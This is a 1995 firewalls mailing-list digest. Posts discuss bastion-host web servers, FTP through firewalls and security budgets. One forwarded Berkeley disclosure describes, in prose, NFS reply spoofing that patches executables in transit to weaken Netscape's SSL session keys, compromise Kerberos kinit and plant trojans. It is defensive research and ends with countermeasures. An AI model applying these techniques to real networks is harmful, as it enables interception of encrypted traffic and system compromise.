<9509168138.AA813868592@GWFX1.sysorex.com> Date: Mon, 16 Oct 1995 12:28:02 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk But there is no way to ensure that the post is actually coming from a subscriber and not someone pretending to be one and what about folks behind exploders? geoff From firewalls-owner Mon Oct 16 12:13:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16634 for firewalls-outgoing; Mon, 16 Oct 1995 12:01:00 -0700 Received: from NYXGATE1.btco.com (gate1.btco.com [198.83.51.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA16627 for ; Mon, 16 Oct 1995 12:00:56 -0700 Received: (from mailer@localhost) by NYXGATE1.btco.com (8.6.9/8.6.9) id OAA09525 for ; Mon, 16 Oct 1995 14:59:12 -0400 Received: from lncsex0003.eu.btco.com(160.82.152.218) by NYXGATE1.btco.com via smap (V1.3) id sma016631; Mon Oct 16 14:58:51 1995 Received: from lncsea0001.eu.btco.com (lncsea0001.eu.btco.com [160.82.136.15]) by LNCSEX0003.eu.btco.com (8.6.9/BTmail) with SMTP id TAA08091 for ; Mon, 16 Oct 1995 19:58:50 +0100 To: avents@btco.com Path: newsadm From: Guru Sundararaman Newsgroups: btco.list.firewalls Subject: external web server administration Date: Mon, 16 Oct 1995 14:04:51 -0400 Organization: Bankers Trust Company Lines: 23 Message-ID: <30829EC3.13AC@btco.com> NNTP-Posting-Host: nycsew0068.btco.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Mailer: Mozilla 2.0b1J (Windows; I; 32bit) ReSent-Date: Mon, 16 Oct 1995 19:58:42 -0900 (PDT) ReSent-From: "Todd S. Aven" ReSent-To: firewalls@greatcircle.com ReSent-X-Sender: avento@lncsex0003.eu.btco.com ReSent-Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk One of the popular implementations of a firewall seem to be that of a bastion host with two interfaces - one to the Internet and the other to your network, and each Internet service supported by an application-level proxy. (1) I would like to hear experiences on how Web server(s) are administered (mainly in areas of monitoring and content population), especially when it is on the external side of a dual interfaced firewall, and the administrators and content authors are on the internal side of the firewall. (2) If the external Web server is a Commerce Server (SSL-based), isn't there a security risk in keeping it on the external segment of the Firewall - given that it needs to contain sensitive information, like user passwords and encryption keys? I would like to know how others have designed their network to support SSL applications. Thanks, -Guru gurus@btco.com From firewalls-owner Mon Oct 16 12:31:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA17399 for firewalls-outgoing; Mon, 16 Oct 1995 12:27:42 -0700 Received: from sbei.com (ftp.sbei.com [198.93.144.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA17390 for ; Mon, 16 Oct 1995 12:27:37 -0700 Reply-To: garyh@sbei.com Received: from sbe1.sbei.com by sbei.com (Internet Gateway) (4.1/SMI-5.2.4) id AA19469; Mon, 16 Oct 95 12:27:57 PDT Received: from sbe1036.sbe by sbe1.sbei.com (4.1/SMI-4.2) id AA06977; Mon, 16 Oct 95 12:27:08 PDT Date: Mon, 16 Oct 95 12:27:08 PDT From: garyh@sbei.com (Gary Hasenfus) Message-Id: <9510161927.AA06977@sbe1.sbei.com> To: firewalls@GreatCircle.COM Subject: Looking For The Numbers Cc: garyh@sbei.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Budgeting time is here again and that requires that I scare my upper managment into supporting good nertwork security for our site. To help with this I am seeking references (URLs perfered) to data that supports the two points listed below. As a long time lurker on this list I know I have seen such things before but can't seam to find them at the momemt. -o- The risk of intrusion is non trivial. - Numbers on the quantity of reported attacks - Figures of merit on how many victum sites report attacks. - Case studies of intrusions at small cap companies. - Other related statistics. -o- The down side of an attack can be substantial. - Numbers on the dollar cost of attacks. - Statistics on what attackers do once a site is breached. - Disaster case studies. - Other related statistics If you respond to me dirrectly I will summarize for the list. Thanks, garyh@sbei.com /-----------------------\_/----------------------------------\ | SBE Inc. | Internet: garyh@sbei.com | | Gary D. Hasenfus | UUNET: uunet.uu.net!sbei!garyh | | 4550 Norris Canyon Rd. | Voice: (510) 355-7726 | | San Ramon, Ca. 94583 | FAX: (510) 355-2020 | \_______________________/-\__________________________________/ --EOM-- From firewalls-owner Mon Oct 16 14:04:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA19529 for firewalls-outgoing; Mon, 16 Oct 1995 13:51:40 -0700 Received: from Aptech.com (rama.aptech.com [199.29.185.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA19508 for ; Mon, 16 Oct 1995 13:51:34 -0700 From: sjones@Aptech.com Received: by Aptech.com (5.x/SMI-SVR4) id AA07961; Mon, 16 Oct 1995 13:48:38 -0700 Date: Mon, 16 Oct 1995 13:48:38 -0700 Message-Id: <9510162048.AA07961@ Aptech.com> To: firewalls@greatcircle.com Subject: FTP Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > On Fri, 13 Oct 1995 11:18:13 -0400 (EDT), "Scott Barman" wrote: > > ... I don't think I'm alone in my desire to see > > something replace it and, as Marcus Ranum said about himself in a previous > > note, I'm not "big" enough to try to force a change! > > How about 15,000 Firewalls readers? ;) I think if Marcus added a new > FTP daemon to the FWTK, we would love to implement it along side our > old FTP connections until it became a de facto standard. Add in the > FWTK-User readers, and I think we could be "big" enough over time. > > If we are the ones to control access to the Internet, we can help dictate > it's use, right? Just do it. From firewalls-owner Mon Oct 16 14:49:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21388 for firewalls-outgoing; Mon, 16 Oct 1995 14:38:58 -0700 Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA01527 for ; Sat, 14 Oct 1995 08:23:19 -0700 From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id LAA18561; Sat, 14 Oct 1995 11:21:17 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id LAA11371; Sat, 14 Oct 1995 11:21:14 -0400 (EDT) Date: Sat, 14 Oct 1995 11:21:14 -0400 (EDT) Message-Id: <199510141521.LAA11371@SPARKY.CF.CS.YALE.EDU> To: ken@bridge.com, steveg@cseic.saic.com Subject: Re: Various FTPs Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Ken Hardy wrote: >HTTP might do for an outgoing-only anonymous FTP replacement. But HTTP >is unidirectional; I can set up an FTP server to allow people to send >me files, but not so with HTTP, and I can configure an FTP server to There is a draft proposal to add to HTTP and HTML a Forms based file upload capability. >change the modes on received files so that even the sender cannot >access them again. Anyone could conceivably fetch the file off my >friend's HTTP server meant for me, passwords notwithstanding. Certainly someone could provide this capability on their Web server by creating an appropriate setuid C or perl program. Anything is possible with programming.... ( better living through programming). - Morrow From firewalls-owner Mon Oct 16 15:16:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21455 for firewalls-outgoing; Mon, 16 Oct 1995 14:40:08 -0700 Received: from ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA18476 for ; Mon, 16 Oct 1995 13:04:47 -0700 Received: from starlight.ingress.com by ingress.com (4.1/SMI-4.1) id AA29097; Mon, 16 Oct 95 15:56:28 EDT Received: by starlight.ingress.com (4.1) id AA09584; Mon, 16 Oct 95 15:57:02 EDT Date: Mon, 16 Oct 1995 15:57:02 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: Application level vs Packet filtering (fwd) Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- Forwarded message ---------- Date: Sat, 14 Oct 1995 20:45:35 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: Application level vs Packet filtering I concurr that combining the two yields both overlap, but also performance advantages. By using packet filters on the 'fringes' of the gateway (internally and externally), you can eliminate (at a high rate) known bad sites. This extends to the level of blocking employee access from sites such as playboy.com, or blocking public access workstation xx.xxx.xxx.xx from accessing the web. These functions could operate on separate platforms, IE TIS FWTK, and a router, or on the same platform like with BorderWare or BlackHole. One nice bennefit of combining the two technologies onto one platform is that you can tell a user why they are being denied access. IE in BorderWare and BlackHole if you are not in a filter list to be allowed web access, the application (since it does look at every packet dis-assembled) can (and does) present a web page informing you that you are being denied access. A strict packet filter would just drop the connection, and leave the user thinking the network was down or something. -Charles Kaplan (yes, I am a BorderWare reseller) for more information check out www.border.com 800-334-8195 (BorderWare) www.milkyway.com 613-596-5549 (BlackHole) From firewalls-owner Mon Oct 16 15:24:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21324 for firewalls-outgoing; Mon, 16 Oct 1995 14:37:10 -0700 Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA20004 for ; Thu, 12 Oct 1995 16:44:21 -0700 Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA25694; Thu, 12 Oct 1995 18:42:24 -0500 Date: Thu, 12 Oct 1995 18:42:24 -0500 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9510122342.AA25694@hosaka.smallworks.com> To: charisse@SmallWorks.COM, firewalls@greatcircle.com, jes@SmallWorks.COM, steve@SmallWorks.COM Subject: Brewer et al. on ``Basic Flaws in Internet Security and Commerce'' Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Forwarded-by: Wendell Craig Baker From: gauthier@espresso.CS.Berkeley.EDU (Paul_A Gauthier) Date: Mon, 09 Oct 1995 14:26:06 -0700 Basic Flaws in Internet Security and Commerce We believe that the current focus on secure session-layer protocols and sufficient randomness have obscured more fundamental flaws in end-to-end security. In particular, secure end-to-end transactions require two parts: a secure protocol to communicate over untrusted channels, and trusted code at both endpoints. The latter problem has received less attention, but destroys security regardless of the quality of the protocols or of the random numbers. We have implemented a series of related attacks utilizing IP spoofing: * We can spoof NFS to patch binaries on the fly if we are on any subnet between the NFS client and NFS server. We used this to turn legitimate Netscape browsers into versions that used a fixed key (known only to us), thus invisibly eliminating security. * The same trick allows us to defeat Kerberos security by attacking kinit. * We can also spoof NFS file-handle lookups, so that we can replace any file (such as .login) with another file that runs with root access privileges (even if the requesting user cannot). These work because the trusted path to executables is really not trustworthy in most environments. Although we use on-the-wire patching to compromise executables, the client binaries can also be compromised during download, by on-the-wire patching of FTP or HTTP transfers. Trojan horses and viruses could also patch the client software after it's on the local disk, especially on systems like Windows 95 that do not provide access control for files. Given that these are realistic threats, we believe that these issues must be resolved before internet security and commerce are realistic. ------------------------------------------------------------------------------- We began to consider in more detail some fundamental weaknesses of common network security practices that would lead to trivial further attacks on Netscape as well as many other security tools like Kerberos. It was our goal to demonstrate that it is trivially possible to patch executables on-the-wire to completely compromise their security. In doing so, we hope to reinforce the point that security is an end-to-end problem that is far harder than getting the protocols correct. Strong, correct protocols only make more subtle endpoint attacks more likely, especially in light of the potential for financial gain as the amount of commerce on the Internet increases. Most of the attacks we discuss are suitable for the systematic exploitation of large groups of users: an entire organization, or even a large fraction of the user base of a particular piece of software. In many computing environments a pool of common executables, like the Netscape binary, are provided to clients by a fileserver. In such systems, including NFS, AFS and Windows NT, there is no authentication of the file contents sent between clients and servers. In these systems there are provisions for sophisticated access checks to determine file permissions, at open or handle lookup time. But the file contents that are read from the server are not authenticated in any secure way. The client has no way to determine if the bytes are indeed being sent by the server. Our first attack model is one in which the attacker has (promiscuous) network access to any machine on any ethernet subnet between the fileserver and the clients under attack. In under a day we produced software that can exploit the lack of authentication in NFS to patch the object code of any executable on-the-wire as it travels between the NFS server and the client machine. The technical details of the attack are rather simple. To retrieve data from the NFS server a client sends a short request message detailing which block from the file it is interested in (where a block is a range of bytes). The attack software is located on an ethernet segment between the client and the NFS server, so is able to snoop this traffic. The attack software snoops, waiting for any request for a particular block of a particular executable; for example, the block containing the session-key generation code in the Netscape executable. It is then able to forge a reply from the NFS server and transmit it to the client. If the forged packet reaches the client before the legitimate reply, it is accepted and the legitimate reply is discarded as a duplicate. There is obviously a race condition between the injection of the forged response and the true response. Since the attacking software is focused solely on this task, while the fileserver is certainly servicing requests from many clients, it stands a very good chance of winning the race. We have observed that the attacking software wins the race a large fraction of the time. Given this ability it becomes possible to compromise the security features of any executable loaded from the network. We have examined the Netscape v1.1N executable and located the code that selects the session key. By patching only 4 bytes we were able to cause the selection of a predictable session key every time the browser engages in the SSL protocol. It is then trivial to snoop and decrypt all traffic from the browser to secure servers, obtaining credit card numbers or other private information. Since this is really an attack on the client, it is not limited to the Netscape browser. On the contrary, it is extremely widely applicable. An appropriate patch to the Kerberos kinit executable makes possible the compromise of any passwords entered by users, and therefore all of the authentication facilities provided by Kerberos. In many environments, including our own here at UC Berkeley, all the Kerberos application binaries are served from an NFS server. This represents a major flaw in security as our attack demonstrates. Having authenticated file services (kerberized NFS or AFS) is useless if the integrity of the kinit executable cannot be ensured (most easily by obtaining it from local disk). However, making local copies of crucial binaries is not sufficient in the face of a more serious set of variants on the NFS spoofing attack. The spoofing software can be placed as before, in a position to snoop requests to the NFS server. As clients issue a lookup filehandle request the spoofing software can return the handle to a different executable and also forge its attributes. By tricking users into executing code that is setuid root, unlimited access to the client's workstation can be obtained easily. It is possible to mount NFS partitions so that setuid root executables will not be honored by the client. Still, the spoofing software can make arbitrary NFS filehandle lookup requests succeed, and substitute a trojan of some sort. The attacker could cause misspellings of commonly executed commands to appear to succeed, or could spoof other files that are trusted by the operating system. For example, the user's .login file is a natural and easy target from which to leverage further damage. This implies that it is unsafe to execute any program obtained via an insecure channel to an NFS server, no matter what the privilege level of the client user. Neither is it limited to NFS or file-serving protocols in particular. Protocols based on TCP, rather than UDP, are just as vulnerable. It is possible to hijack non-authenticated TCP connections, although it is somewhat more complicated. Attacks based on spoofing traffic coming from the distribution site of popular software packages is also possible. Berkeley, for example, is a mirror site for the Netscape browser. Any student with promiscuous network access on a machine between the ftp server and the main link to the larger Internet could have installed similar patching software to patch the huge number of copies of the binary that were retrieved from server.berkeley.edu. More mundane attacks based on trojan horses or viruses remain viable today. These attacks must exploit some other weakness in a system's security to infiltrate, but once in place they can perform patches to local binaries to fully compromise a system. Previously such attacks were mostly motived only by ego or malice; it is now more valuable to compromise a client invisibly, so that the user believes the system is secure. Thus, unlike traditional viruses, the new strains will aim to have no visible effect on the system, thus making them difficult to detect and easy to spread unintentionally. Our patch of Netscape has this flavor. We realize that it is impossible to eliminate all security holes; one can always question whether it is safe to trust the hardware, or whether outside channels used for communication of public keys or checksums are truly secure, etc. Fortunately, in practice it should suffice to handle far less than all of these risks. We hope to have demonstrated one gaping hole in practical security today, and to have highlighted the problem of the trusted endpoint. There is one simple step that we can suggest that would go a long way towards improving the security of endpoints. Increasing the practice of software providers widely publishing cryptographically secure checksums of their executables would be extremely helpful. A small amount of paranoia and care must be applied to securing the executables used in the verification process. A read-only floppy disk would be appropriate to hold the verification software, for example. We are concerned that security on users' workstations and PCs is currently insufficient. When real money is at stake, endpoint security must withstand greater scrutiny. In summary, protecting the communications channel doesn't help if the endpoints can be subverted. We implemented and discussed several related attacks that replace legitimate programs by compromised versions. Until we can trust every program that executes between the time we boot and the time we finish the secure protocol, we cannot reliably authenticate anything. Today there is no basis for this trust. Eric Brewer, brewer@cs.berkeley.edu Paul Gauthier, gauthier@cs.berkeley.edu Ian Goldberg, iang@cs.berkeley.edu David Wagner, daw@cs.berkeley.edu A copy of this post is available as http://http.cs.berkeley.edu/~gauthier/endpoint-security.html From firewalls-owner Mon Oct 16 15:43:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA23274 for firewalls-outgoing; Mon, 16 Oct 1995 15:41:11 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA23267 for ; Mon, 16 Oct 1995 15:41:06 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA07991; Tue, 17 Oct 1995 08:34:15 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma007983; Tue Oct 17 08:33:44 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA15859; Tue, 17 Oct 1995 08:39:51 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9510162239.AA15859@citecub.citec.qld.gov.au> Subject: Re: Various FTPs To: wbunting@ch.inri.com (Bill Bunting) Date: Tue, 17 Oct 95 8:39:50 EST Cc: firewalls@greatcircle.com In-Reply-To: <199510161348.JAA01522@hatteras.ch.inri.com>; from "Bill Bunting" at Oct 16, 95 9:48 am X-Mailer: ELM [version 2.3 PL11] content-length: 1501 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My mailer thinks Bill Bunting said: > [irrelevant stuff deleted] > > > >Why doesn't PASV do the trick? > > > >Colin > > > > > > Here is a clip from an earlier posting of mine. The problem is how to do > FTP when both sides require PASV as is the case with many firewalls. (i.e. > firewall to firewall FTP is the problem) > > > Internal users are allowed to use FTP to login to non firewall protected > sites using passive FTP. However, in order to have an FTP session, one of > the two sides must allow arbitrary port connections. If two firewall > protected sites want to talk FTP, one of the two sides must allow arbitrary > ports. With our firewall, this is not allowed. > > Here is what it looks like (To simplify, TIS fwtk proxy not shown): > > Client tries passive mode... > C-|----------21-control-connection---|-> S > C-|---21---PASV Command--------------|-> S > C-|------arbitrary-port-for-data---->| S (blocked by server side firewall) > > Client tries PORT command.... > C-|----------21-control-connection---|-> S > C-|---21-PORT--Command---------------|-> S > C |<------arbitrar